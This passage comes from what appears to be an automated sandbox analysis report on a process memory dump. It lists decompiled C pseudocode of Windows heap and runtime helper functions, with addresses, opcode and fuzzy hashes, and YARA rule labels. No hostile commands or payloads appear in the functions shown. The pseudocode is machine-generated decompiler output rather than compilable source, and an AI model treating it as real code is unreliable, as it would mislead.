				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E015F7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0161B640(E01619AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x016a8ce5
0x016a8ced
0x016a8cf0
0x016a8cfb
0x016a8d0d
0x016a8cfd
0x016a8d06
0x016a8d06
0x016a8d18
0x016a8d19
0x016a8d1b
0x016a8d20
0x016a8d33

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e75740e9ad9a0d5170a4db23dd87138bae1927f18b40d07c5031cd6e7805c98a
Instruction ID: 8eb6421522d27e865e4f9ea12d430f3c2912bd00cacec4b9d71d18896826c4af
Opcode Fuzzy Hash: e75740e9ad9a0d5170a4db23dd87138bae1927f18b40d07c5031cd6e7805c98a
Instruction Fuzzy Hash: 94F08271A04209AFDB04EBA9DD55E6E77B8EF59304F540199E916EB3C0EA34DD00CB98

Uniqueness

Uniqueness Score: -1.00%

Function 015D4F2E, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E015D4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E016A88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E015FC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x15b1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x015d4f2e
0x015d4f34
0x015d4f38
0x01630b85
0x01630b85
0x01630b89
0x01630b9a
0x01630b9a
0x01630b9f
0x00000000
0x01630b9f
0x01630b94
0x01630b98
0x00000000
0x00000000
0x00000000
0x01630b98
0x015d4f3e
0x015d4f48
0x00000000
0x015d4f6e
0x00000000
0x015d4f70

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b9674ecb5eb57d85ea9b0b3ca8f030da8c8092ddd58a4610aaecfa0762a0082
Instruction ID: c0ca5409dc391d43c655a20eef21bccb0fca985c7287a04f6b5c9393d8a81151
Opcode Fuzzy Hash: 1b9674ecb5eb57d85ea9b0b3ca8f030da8c8092ddd58a4610aaecfa0762a0082
Instruction Fuzzy Hash: 86F0E2329256CA8FD776CB1CC984B22B7D8AF94778F454474E4068BB22C735EC48C640

Uniqueness

Uniqueness Score: -1.00%

Function 0160A44B, Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0160A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x16c7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L015F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0161FA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x0160a44b
0x0160a453
0x0160a472
0x0160a476
0x00000000
0x0160a493
0x0160a47a
0x0160a47f
0x0160a486
0x00000000

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13f9aedb4439394aba390d15e2679d169de683ffc846018bfc423a41f1a6606a
Instruction ID: d026cfc9341cd4863a0ffa377397407c09c522f118daf21de16962b78bf171ed
Opcode Fuzzy Hash: 13f9aedb4439394aba390d15e2679d169de683ffc846018bfc423a41f1a6606a
Instruction Fuzzy Hash: FAE09272A42422ABD3225E58ED00F6773ADEBE4651F0A4039FA04CB254D628DD12C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 015DF358, Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E015DF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0160F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L015F4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x015df35d
0x015df361
0x015df367
0x015df372
0x015df38c
0x015df38c
0x015df394

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: da9032ce062f562b59c0869ecd8e9e87ff8858758f0efad0cd94fcbfd7d2fff9
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: B5E0D832A40118FBDB3597DDAD05F5BBFADEB54A60F050196BA04DB150D9609E00C3D1

Uniqueness

Uniqueness Score: -1.00%

Function 015EFF60, Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E015EFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x15b11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E016A88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E015F0050(_t14);
				}
			}

0x015eff66
0x015eff6b
0x00000000
0x015eff8f
0x00000000
0x015eff8f

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f11531332a9078284933e3440c1f64b308331e5c664d64cc63b2f9cc20a301c7
Instruction ID: 0a6f7ac6e51d9949cf305af57845652846983b7002743a03ae70d466165a255c
Opcode Fuzzy Hash: f11531332a9078284933e3440c1f64b308331e5c664d64cc63b2f9cc20a301c7
Instruction Fuzzy Hash: 67E092B09052449FD739D799D198F2937DCBF55621F19841EE0284F102EA21D840C789

Uniqueness

Uniqueness Score: -1.00%

Function 016641E8, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E016641E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x16b08f0);
				_t5 = E0162D08C(__ebx, __edi, __esi);
				if( *0x16c87ec == 0) {
					E015EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x16c87ec == 0) {
						 *0x16c87f0 = 0x16c87ec;
						 *0x16c87ec = 0x16c87ec;
						 *0x16c87e8 = 0x16c87e4;
						 *0x16c87e4 = 0x16c87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L01664248();
				}
				return E0162D0D1(_t5);
			}

0x016641e8
0x016641ea
0x016641ef
0x016641fb
0x01664206
0x0166420b
0x01664216
0x0166421d
0x01664222
0x0166422c
0x01664231
0x01664231
0x01664236
0x0166423d
0x0166423d
0x01664247

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b390b03ce5e408e3092d359e730e527ea41f2148c6822a8b609f490e7f4fbb4b
Instruction ID: cf3dd842a7688326f647554334b3ba14ef8f1269f2a9319525d539f0699b2a7b
Opcode Fuzzy Hash: b390b03ce5e408e3092d359e730e527ea41f2148c6822a8b609f490e7f4fbb4b
Instruction Fuzzy Hash: 5FF0F2748217018ECBB1EFA9DD047B836ACF754650F11A11AD00087298EB3445B0CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0168D380, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0168D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L015DE8B0(__ecx, _a4, 0xfff);
					L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x0168d38a
0x0168d39b
0x0168d3b1
0x00000000
0x0168d3b6
0x00000000

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: cc5e7247e1ce00a974c25ad4ce5d00772a0487e94a83bd13a921bce9940dc5dd
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: A0E0C231281646BBDB226E88CC01FA97B16EB917A1F104031FE085E7D0CA71AC92D6D4

Uniqueness

Uniqueness Score: -1.00%

Function 0160A185, Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0160A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x16c67e4 >= 0xa) {
					if(_t5 < 0x16c6800 || _t5 >= 0x16c6900) {
						return L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E015F0010(0x16c67e0, _t5);
				}
			}

0x0160a190
0x0160a1a6
0x0160a1c2
0x00000000
0x00000000
0x00000000
0x0160a192
0x0160a192
0x0160a19f
0x0160a19f

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3cafa58ff15fcc89538f0730ab0d662fd2fefd8d523b1f06c6f14be9c1d76ff
Instruction ID: 27e0334d907849550c3a01f3424bd7dc9ba0c1a815c830887ff854ae41299984
Opcode Fuzzy Hash: a3cafa58ff15fcc89538f0730ab0d662fd2fefd8d523b1f06c6f14be9c1d76ff
Instruction Fuzzy Hash: B7D0C2611221411AC72E1B40CD14BB32212F7C8A91F24084CE2020B7D0E96088E4815C

Uniqueness

Uniqueness Score: -1.00%

Function 016016E0, Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E016016E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E01601710(0x16c67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L015F4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x016016e8
0x016016ef
0x016016f3
0x016016fe
0x00000000
0x01601700
0x0160170d
0x0160170d
0x016016f2
0x016016f2
0x016016f2
0x016016f2

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 952f93e0700e8177790094714b924c48379cb9e034bc57f9051869a28cb470de
Instruction ID: 57687b10431b0aee0828b9e9f4254c9491ce9353b1b5319d11e0d27ced5b53f4
Opcode Fuzzy Hash: 952f93e0700e8177790094714b924c48379cb9e034bc57f9051869a28cb470de
Instruction Fuzzy Hash: 59D0A73115010196EE2E5B189C14B272652FBD1B81F38005CF317496C0CFA0CD92E05C

Uniqueness

Uniqueness Score: -1.00%

Function 016553CA, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E016553CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E015EEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x016553ca
0x016553ce
0x016553d9
0x016553de
0x016553e1
0x016553e1
0x016553e6
0x016553f3
0x00000000
0x016553f8
0x016553fb

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: c02419869ee90b388aaf7fc6ce4d07c4be3ae78f7e26fb6ddb990d18408acf1a
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: CBE08C329106819BCF12DB48CA54F4EBBF9FB84B00F140008A5095F721C724AC00CB40

Uniqueness

Uniqueness Score: -1.00%

Function 015EAAB0, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E015EAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x015eaab6
0x015eaabb
0x0163a442
0x00000000
0x0163a448
0x0163a454
0x0163a454
0x015eaac1
0x015eaac1
0x015eaac6
0x015eaac6

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 5e180eb7ff6cd948fe345f54450c369899474d24df41219060ad38de8eb3530f
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 5AD0E935352A80CFE61BCB5DC958B1577A4BB44B44FC50490E541CB762E76CD954CA00

Uniqueness

Uniqueness Score: -1.00%

Function 016035A1, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E016035A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E015EEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x016035a1
0x016035a1
0x016035a5
0x016035ab
0x016035ab
0x016035b5
0x00000000
0x016035c1
0x016035b7

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: 36abfa5215d689ac828424eafcf6995b7c160c3d73102264257942a72d110ebc
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 53D0A7318115819DDB0BAB14C92876A37B6FB00206F58105580010D7F2C337490AC600

Uniqueness

Uniqueness Score: -1.00%

Function 015DDB40, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E015DDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L015F4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x015ddb4d
0x015ddb54
0x015ddb5f
0x015ddb56
0x015ddb56
0x015ddb5c
0x015ddb5c

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: 14f9ae008f3b372210bb5937792bd3ee901cc48eb273542f96ca99f1d26d2aaf
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: ADC08C30280A42ABFB321F24CD01B013AA0BB50B45F4400A06300DE0F0DB78D901EB00

Uniqueness

Uniqueness Score: -1.00%

Function 0165A537, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0165A537(intOrPtr _a4, intOrPtr _a8) {

				return L015F8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x0165a553

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: db9eca0bbf25e5833e936d3dc387f1e13eccfce5056d9cea1210b3a511be3be7
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: B3C01232080648BBCB126E81CC00F067B2AFBA4B60F008014BA080E5608632E970EA84

Uniqueness

Uniqueness Score: -1.00%

Function 015F3A1C, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E015F3A1C(intOrPtr _a4) {
				void* _t5;

				return L015F4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x015f3a35

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: bd4a06f8c0293d0dad870b2fdd3606bbafd3663511d7a37d2a8606ed93446bd3
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: BDC04C32180649BBCB126E45DD01F167B69E7A4B60F154025B7040A5618576ED61D598

Uniqueness

Uniqueness Score: -1.00%

Function 015DAD30, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E015DAD30(intOrPtr _a4) {

				return L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x015dad49

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: bfca1f05e1d0a454fa732138240e61d06ab2e0bc0dc1c624e8fe805581ca038c
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: CDC08C32080248BBC7126A45CD00F017B29E7A4B60F000020B6040A6618932E861D588

Uniqueness

Uniqueness Score: -1.00%

Function 016036CC, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E016036CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L015F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x016036d2
0x016036e8
0x016036d4
0x016036e5
0x016036e5

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 366778abc973be3c4e2292d5fcee22bef9d434a4875b9b5c7ac13fd24d42dc75
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: AFC02B70160440FFDB1A1F30CD00F167254F750B22F6403587320496F0E6289C00D100

Uniqueness

Uniqueness Score: -1.00%

Function 015E76E2, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E015E76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x015e76e4
0x00000000
0x015e76f8
0x015e76fd

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 7ec6e950972af9a974b422561214aa1d6de29bb571c78e036dfa76568b55ec20
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: BEC08C705521815AEB2E5B0CCE28B283A90BB0C64CF48019CAB210D4A2C368B803CA88

Uniqueness

Uniqueness Score: -1.00%

Function 015F7D50, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E015F7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x015f7d56
0x015f7d5b
0x015f7d60
0x015f7d5d
0x015f7d5d
0x015f7d5d

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 44dca805cf7807423fbd1877305476480578f7a241a41c4af011dbb8a282acff
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 79B092353019408FCE16DF18C180B1933E4BB48A40B8400D4E400CBA21D229E8008900

Uniqueness

Uniqueness Score: -1.00%

Function 01602ACB, Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01602ACB() {
				void* _t5;

				return E015EEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x01602adc

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 269e7546df18614c2b06fed652c490cea2e4a1c42088282babe9999d9030a0f1
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: CBB01233C20442CFCF06EF40C610B197375FB40750F05449090012B930C228AC01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 01619950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1872b0830db1ce269e118c3a841126ab5f8d3b5f3133487f3dfd9185a760f5e
Instruction ID: 12da7eda7d34a2b2ebb09020f1a946999002021f6330aad046c3589af020c6b4
Opcode Fuzzy Hash: a1872b0830db1ce269e118c3a841126ab5f8d3b5f3133487f3dfd9185a760f5e
Instruction Fuzzy Hash: 0C9002A130181403D14069994C056070009A7D0352F61C011E6054655ECA698C517575

Uniqueness

Uniqueness Score: -1.00%

Function 016199D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb9e12ebf28d46a23515b0bc6e2ccb35506cf3d46863394046feb21a38944ac2
Instruction ID: 827b9df6cc354903d2e7e9a4a00dcd2c7b64f1dd0b794f5658ea9223840bc3e6
Opcode Fuzzy Hash: fb9e12ebf28d46a23515b0bc6e2ccb35506cf3d46863394046feb21a38944ac2
Instruction Fuzzy Hash: 799002A131141042D104659948057070049A7E1251F61C012E6144654CC5698C616565

Uniqueness

Uniqueness Score: -1.00%

Function 0161B040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ae0866d8ceac79abad31979c8bead7c7721cc1325b92ccd9ae3d20533ad84c3
Instruction ID: 630deb2f2659be5602ff83e01941e9c232c0c78d1352b1c0a708c74ce12f0caa
Opcode Fuzzy Hash: 2ae0866d8ceac79abad31979c8bead7c7721cc1325b92ccd9ae3d20533ad84c3
Instruction Fuzzy Hash: 809002A1701550434540B5994C054075019B7E13513A1C121E4444660CC6A88855A6A5

Uniqueness

Uniqueness Score: -1.00%

Function 01619820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113bafa23ebe2492039ec8ccd316bf8572fda3122d5536a4342adc83765ea4b1
Instruction ID: 828594d538c16811b36f4f354d63c24f5b79a30fc32862590f7a964f32dd6cf1
Opcode Fuzzy Hash: 113bafa23ebe2492039ec8ccd316bf8572fda3122d5536a4342adc83765ea4b1
Instruction Fuzzy Hash: F290027134141402D14175994805607000DB7D0291FA1C012E4414654EC6958A56BEA1

Uniqueness

Uniqueness Score: -1.00%

Function 016198A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2062c2e6f339f9911120c69d8383820a3990eda5657e2db95bcb382eae3c65f
Instruction ID: 605438ed764b64ec5cb336eaca39f642f25753c8358fb390f3d17a9250f352bf
Opcode Fuzzy Hash: a2062c2e6f339f9911120c69d8383820a3990eda5657e2db95bcb382eae3c65f
Instruction Fuzzy Hash: 1490026130141402D10265994815607000DE7D1395FA1C012E5414655DC6658953B572

Uniqueness

Uniqueness Score: -1.00%

Function 01619B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41a8620c532347c2773665152d4f3af94f3a5dd4a7a89bc9f0b9858518158cbd
Instruction ID: 99757fb2bb9f39ff59738fca70066267a19aa66bdea1547effe357b197e2bc54
Opcode Fuzzy Hash: 41a8620c532347c2773665152d4f3af94f3a5dd4a7a89bc9f0b9858518158cbd
Instruction Fuzzy Hash: 0290026134141802D14075998815707000AE7D0651F61C011E4014654DC65689657AF1

Uniqueness

Uniqueness Score: -1.00%

Function 0161A3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59ad0d25f6ec355728b45a1f08930ec2d8f856cacbbc33c4ae2f0a17b140c1f1
Instruction ID: 34168e56090a19dfb8bb883f068fa17ad4f3f918ee220af533dbfeb1b59710f8
Opcode Fuzzy Hash: 59ad0d25f6ec355728b45a1f08930ec2d8f856cacbbc33c4ae2f0a17b140c1f1
Instruction Fuzzy Hash: 3890027130185002D1407599884560B5009B7E0351F61C411E4415654CC6558856A661

Uniqueness

Uniqueness Score: -1.00%

Function 01619A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
